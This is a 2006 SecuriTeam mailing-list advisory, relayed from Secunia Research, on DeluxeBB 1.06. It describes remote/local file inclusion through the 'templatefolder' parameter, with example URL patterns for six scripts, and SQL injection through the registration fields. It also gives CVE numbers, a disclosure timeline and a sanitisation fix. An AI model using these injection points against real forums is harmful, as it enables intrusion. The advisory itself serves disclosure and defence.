From: SecuriTeam <support@securiteam.com.>
To: [email protected]
Date: 30 Aug 2006 15:10:15 +0200
Subject: [UNIX] DeluxeBB SQL Injection and File Inclusion Vulnerabilities
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-Id: <20060830124202.BC9CE5790@mail.tyumen.ru.>
X-Virus-Scanned: antivirus-gw at tyumen.ru
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
DeluxeBB SQL Injection and File Inclusion Vulnerabilities
------------------------------------------------------------------------
SUMMARY
<http://www.deluxebb.com/>; DeluxeBB features "lots of security options
all over the board (like CP logs, Admin Restrictions, Database Backup
System, Email Bot protection, hide email option, user groups) but most
important is the speed". Secunia Research has discovered some
vulnerabilities in DeluxeBB, which can be exploited by malicious people to
conduct SQL injection attacks and compromise a vulnerable system.
DETAILS
Vulnerable Systems:
* DeluxeBB version 1.06
1) Input passed to the "templatefolder" parameter in various scripts isn't
properly verified, before it is used to include files. This can be
exploited to include arbitrary files from external and local resources.
Examples:
http://[host]/templates/deluxe/postreply.php?templatefolder=[file]
http://[host]/templates/deluxe/posting.php?templatefolder=[file]
http://[host]/templates/deluxe/pm/newpm.php?templatefolder=[file]
http://[host]/templates/default/postreply.php?templatefolder=[file]
http://[host]/templates/default/posting.php?templatefolder=[file]
http://[host]/templates/default/pm/newpm.php?templatefolder=[file]
Successful exploitation requires that "register_globals" is enabled.
2) Input passed to the "hideemail", "languagex", "xthetimeoffset", and
"xthetimeformat" parameters when registering for an account isn't properly
sanitised before being used in a SQL query. This can be exploited to
manipulate SQL queries by injecting arbitrary SQL code.
Successful exploitation requires that "magic_quotes_gpc" is disabled.
The vulnerabilities have been confirmed in version 1.06. Other versions
may also be affected.
Solution:
Edit the source code to ensure that input is properly sanitised and
verified.
Time Table:
26/05/2006 - Initial vendor notification.
14/06/2006 - Public disclosure.
CVE Information:
<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2914>;
CVE-2006-2914,
<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2915>;
CVE-2006-2915
ADDITIONAL INFORMATION
The information has been provided by <mailto:vuln-remove@secunia.com.>
Secunia Research.
The original article can be found at:
<http://secunia.com/secunia_research/2006-44/advisory/>;
http://secunia.com/secunia_research/2006-44/advisory/
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: [email protected]
In order to subscribe to the mailing list, simply forward this email to: [email protected]
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
